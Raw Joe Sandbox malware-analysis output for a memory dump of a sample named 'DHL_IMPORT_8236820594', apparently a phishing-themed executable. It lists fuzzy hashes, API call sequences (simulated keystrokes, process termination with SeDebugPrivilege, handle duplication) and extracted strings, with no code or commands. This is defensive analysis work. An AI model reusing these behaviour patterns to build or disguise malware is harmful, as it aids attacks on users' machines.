                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                          • String ID:
                                                                                          • API String ID: 337547030-0
                                                                                          • Opcode ID: 75de4445b8b5bf20d59f39cbb57021e6e326aab50c0207004565157a32493f1a
                                                                                          • Instruction ID: 41b109a588753690404ae78a513322b1fdc149cd0907ec95e0cddd4d585be3c5
                                                                                          • Opcode Fuzzy Hash: 75de4445b8b5bf20d59f39cbb57021e6e326aab50c0207004565157a32493f1a
                                                                                          • Instruction Fuzzy Hash: 97318F71602649AFDB619FB5DD44A76BBFDFF18300B00442EF996C2620DBB1E8149B60
                                                                                          APIs
                                                                                            • Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
                                                                                            • Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
                                                                                            • Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 008325BD
                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008325DB
                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008325DF
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 008325E9
                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00832601
                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00832605
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0083260F
                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00832623
                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00832627
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2014098862-0
                                                                                          • Opcode ID: a4b008691c376bad15793c5382c0ccc9bf80e001016108844cf1b025860233eb
                                                                                          • Instruction ID: cde2a2a633c31cb34655938ad20435f07b4c0e481999eedf88faced651d6f56e
                                                                                          • Opcode Fuzzy Hash: a4b008691c376bad15793c5382c0ccc9bf80e001016108844cf1b025860233eb
                                                                                          • Instruction Fuzzy Hash: 6F01D830390624BBFB107768DC8AF693F59FF9EB11F111005F354EE0D1C9E124448AAA
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00831449,?,?,00000000), ref: 0083180C
                                                                                          • HeapAlloc.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 00831813
                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00831449,?,?,00000000), ref: 00831828
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00831449,?,?,00000000), ref: 00831830
                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 00831833
                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00831449,?,?,00000000), ref: 00831843
                                                                                          • GetCurrentProcess.KERNEL32(00831449,00000000,?,00831449,?,?,00000000), ref: 0083184B
                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 0083184E
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00831874,00000000,00000000,00000000), ref: 00831868
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 1957940570-0
                                                                                          • Opcode ID: 1e922e2c32b2615c1fb18d1ff600451bce142478eefe272177689819de236dc1
                                                                                          • Instruction ID: 2e43a244d80bebe053aaaad723e4c2caaa093399c7cfc34fc813b6410cbd0df0
                                                                                          • Opcode Fuzzy Hash: 1e922e2c32b2615c1fb18d1ff600451bce142478eefe272177689819de236dc1
                                                                                          • Instruction Fuzzy Hash: 1201BBB5240348BFE710ABA5DC4DF6B7BACFB8AB11F015411FA45DB2A1CAB59800CB70
                                                                                          APIs
                                                                                            • Part of subcall function 0083D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0083D501
                                                                                            • Part of subcall function 0083D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0083D50F
                                                                                            • Part of subcall function 0083D4DC: CloseHandle.KERNEL32(00000000), ref: 0083D5DC
                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0085A16D
                                                                                          • GetLastError.KERNEL32 ref: 0085A180
                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0085A1B3
                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0085A268
                                                                                          • GetLastError.KERNEL32(00000000), ref: 0085A273
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085A2C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                          • String ID: SeDebugPrivilege
                                                                                          • API String ID: 2533919879-2896544425
                                                                                          • Opcode ID: a3fd323f1cef508acc8269ff10a0e49cce8d364734e4daddabcdbb702458c34b
                                                                                          • Instruction ID: 179cca3ad32586910f3e31681ef658fffb1b97ab2fa80efbed0c9ae0cfa489ba
                                                                                          • Opcode Fuzzy Hash: a3fd323f1cef508acc8269ff10a0e49cce8d364734e4daddabcdbb702458c34b
                                                                                          • Instruction Fuzzy Hash: BC617C312082429FD714DF18C4D9F25BBA1FF44319F18858CE8668B7A2C7B6EC49CB92
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00863925
                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0086393A
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00863954
                                                                                          • _wcslen.LIBCMT ref: 00863999
                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 008639C6
                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008639F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                          • String ID: SysListView32
                                                                                          • API String ID: 2147712094-78025650
                                                                                          • Opcode ID: 57005d605aa196ccd2b1e31632543b6f2a56e725e47b94a6959e1d58e9efb42a
                                                                                          • Instruction ID: 337910a69c09f2191850d604dfe03dac6532d8c8b3d26fb7a59ddf7128e131c8
                                                                                          • Opcode Fuzzy Hash: 57005d605aa196ccd2b1e31632543b6f2a56e725e47b94a6959e1d58e9efb42a
                                                                                          • Instruction Fuzzy Hash: BC41A571A00219ABEF219F64CC49FEA7BA9FF08354F11052AF959E7281D7B59D80CB90
                                                                                          APIs
                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0083BCFD
                                                                                          • IsMenu.USER32(00000000), ref: 0083BD1D
                                                                                          • CreatePopupMenu.USER32 ref: 0083BD53
                                                                                          • GetMenuItemCount.USER32(00D95280), ref: 0083BDA4
                                                                                          • InsertMenuItemW.USER32(00D95280,?,00000001,00000030), ref: 0083BDCC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                          • String ID: 0$2
                                                                                          • API String ID: 93392585-3793063076
                                                                                          • Opcode ID: 6f56d075126500bd95454ad9bae9409e58424027189e612d5bad42482c8f97c7
                                                                                          • Instruction ID: 66ee049a7c0a492ec0f99d3cdf12c4639334d7507380c36f3b2a949ca940f673
                                                                                          • Opcode Fuzzy Hash: 6f56d075126500bd95454ad9bae9409e58424027189e612d5bad42482c8f97c7
                                                                                          • Instruction Fuzzy Hash: D451AFB0A042099BDF20DFA8D888BAEBBF4FF85354F144159E651E7291D7709D41CBA2
                                                                                          APIs
                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0083C913
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconLoad
                                                                                          • String ID: blank$info$question$stop$warning
                                                                                          • API String ID: 2457776203-404129466
                                                                                          • Opcode ID: 4ba74bc0edc418b03ebe81eb3975848c5e1dffbdd323d634e85ddd7aaeec0892
                                                                                          • Instruction ID: bab7d15ca90692d81cc114e08681ce32b5298a3fc636daae829ebf2897bb04ce
                                                                                          • Opcode Fuzzy Hash: 4ba74bc0edc418b03ebe81eb3975848c5e1dffbdd323d634e85ddd7aaeec0892
                                                                                          • Instruction Fuzzy Hash: E711EE3268930ABAEB016B549C82DBB7B9CFF55354F11406AF900F5381E7A46F0053A4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$LocalTime
                                                                                          • String ID:
                                                                                          • API String ID: 952045576-0
                                                                                          • Opcode ID: bbe7c49a4c260f75ec83b795a58db11bb3c5e4c8c3dd2991a342aad301fd4de3
                                                                                          • Instruction ID: 9005b4fee67a1573adadde7ea8da5e073b54b8f6bed06060ebee01e094dfbc77
                                                                                          • Opcode Fuzzy Hash: bbe7c49a4c260f75ec83b795a58db11bb3c5e4c8c3dd2991a342aad301fd4de3
                                                                                          • Instruction Fuzzy Hash: 4441AF66D1021CB6CB11EBF4888A9DFB3A8FF45700F408466E614E3261EB38E245C3E6
                                                                                          APIs
                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 007EF953
                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0082F3D1
                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0082F454
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ShowWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1268545403-0
                                                                                          • Opcode ID: 26150dfb17ba74dbefc8f65ad767d487d86ae40b3e88b3a5934f550e8830f05a
                                                                                          • Instruction ID: d1eba26eeb5312bf5f89ef1a611ae41b32a76ec02e6ec90a9d37ff01e858f902
                                                                                          • Opcode Fuzzy Hash: 26150dfb17ba74dbefc8f65ad767d487d86ae40b3e88b3a5934f550e8830f05a
                                                                                          • Instruction Fuzzy Hash: 9941E6316096C0BAD7359B2A988CB2A7AA1BB5E314F15443DE1C7D6E63C679B8C0CB11
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(00000000), ref: 00862D1B
                                                                                          • GetDC.USER32(00000000), ref: 00862D23
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00862D2E
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00862D3A
                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00862D76
                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00862D87
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00865A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00862DC2
                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00862DE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3864802216-0
                                                                                          • Opcode ID: cc2e2a804e71d937c05ea8e758b3d4ded2ba2c9d6dcf9ac44a3ad581948152a4
                                                                                          • Instruction ID: fde8fb903ffbc60a23ac92f5e6cde3b8c0f396abf1542907a8265363824b14a2
                                                                                          • Opcode Fuzzy Hash: cc2e2a804e71d937c05ea8e758b3d4ded2ba2c9d6dcf9ac44a3ad581948152a4
                                                                                          • Instruction Fuzzy Hash: 47318772201614BBEB218F54DC8AFFB3BA9FB09715F0550A5FE48DA291C6B59C40CBA4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 2931989736-0
                                                                                          • Opcode ID: 8daf8397625525775e40556ad3c29ed58928fc53b2d2f6be8ca8299c6dd0d551
                                                                                          • Instruction ID: 45820001bf4c1f75dcc1ad0f6418d34b1c979b0d8077dce72757c3e108fc792f
                                                                                          • Opcode Fuzzy Hash: 8daf8397625525775e40556ad3c29ed58928fc53b2d2f6be8ca8299c6dd0d551
                                                                                          • Instruction Fuzzy Hash: 2A2180A1644A1DFBD21456209E83FBA235DFFB0394F850020FE05DA782F768ED10C6E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                          • API String ID: 0-572801152
                                                                                          • Opcode ID: 6f888af29973e4d308f58eeb948eb828a389bcde8596015cedb5eef550413395
                                                                                          • Instruction ID: 871cc27213e9bda3a34126ad7cc6038c82ad7036367c061c562b595e546b8cb7
                                                                                          • Opcode Fuzzy Hash: 6f888af29973e4d308f58eeb948eb828a389bcde8596015cedb5eef550413395
                                                                                          • Instruction Fuzzy Hash: ECD1B171A0060A9FDF10CFA8C8A1BAEB7B5FF48355F148069E915EB281E771DD49CB90
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 008115CE
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00811651
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008116E4
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 008116FB
                                                                                            • Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00811777
                                                                                          • __freea.LIBCMT ref: 008117A2
                                                                                          • __freea.LIBCMT ref: 008117AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                          • String ID:
                                                                                          • API String ID: 2829977744-0
                                                                                          • Opcode ID: 11454f007de13de8be5c07739d50c05d322f8b4e3c40db2725fd55b3db504839
                                                                                          • Instruction ID: 3b7673bc27921aced05ea7ae3d99408d5174b214b3b2b2313684c4320bb6c458
                                                                                          • Opcode Fuzzy Hash: 11454f007de13de8be5c07739d50c05d322f8b4e3c40db2725fd55b3db504839
                                                                                          • Instruction Fuzzy Hash: 3A91A571E0021A9ADF208E74DC89AEE7BBEFF49714F184659EA05E7281DB35DC80C760
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                          • API String ID: 2610073882-625585964
                                                                                          • Opcode ID: 52edd44ebb316005dbe0f738c1b11fa56779c9954aa06a5bfc4b0069e01026dd
                                                                                          • Instruction ID: 6bc41bd9291d7315ee098b437fd2b518c0562d0295cc09f3a3e11fc66f18cdf5
                                                                                          • Opcode Fuzzy Hash: 52edd44ebb316005dbe0f738c1b11fa56779c9954aa06a5bfc4b0069e01026dd
                                                                                          • Instruction Fuzzy Hash: 45919171A00219ABDF20CFA5C844FAE7BB8FF49719F109559F915EB280D7709989CFA0
                                                                                          APIs
                                                                                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0084125C
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00841284
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008412A8
                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008412D8
                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0084135F
                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008413C4
                                                                                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00841430
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                          • String ID:
                                                                                          • API String ID: 2550207440-0
                                                                                          • Opcode ID: b8ed39c549d3cc940f87810eef81ad2da9b92d130a84c5b049160c2113c22aaa
                                                                                          • Instruction ID: 04935c39c8a53fe5f7e026149213559388c7e8939009b4acde79d3c2467da363
                                                                                          • Opcode Fuzzy Hash: b8ed39c549d3cc940f87810eef81ad2da9b92d130a84c5b049160c2113c22aaa
                                                                                          • Instruction Fuzzy Hash: 6191D275A0021D9FDF01DFA8C888BBEB7B5FF44315F154029E940EB291DBB8A981CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
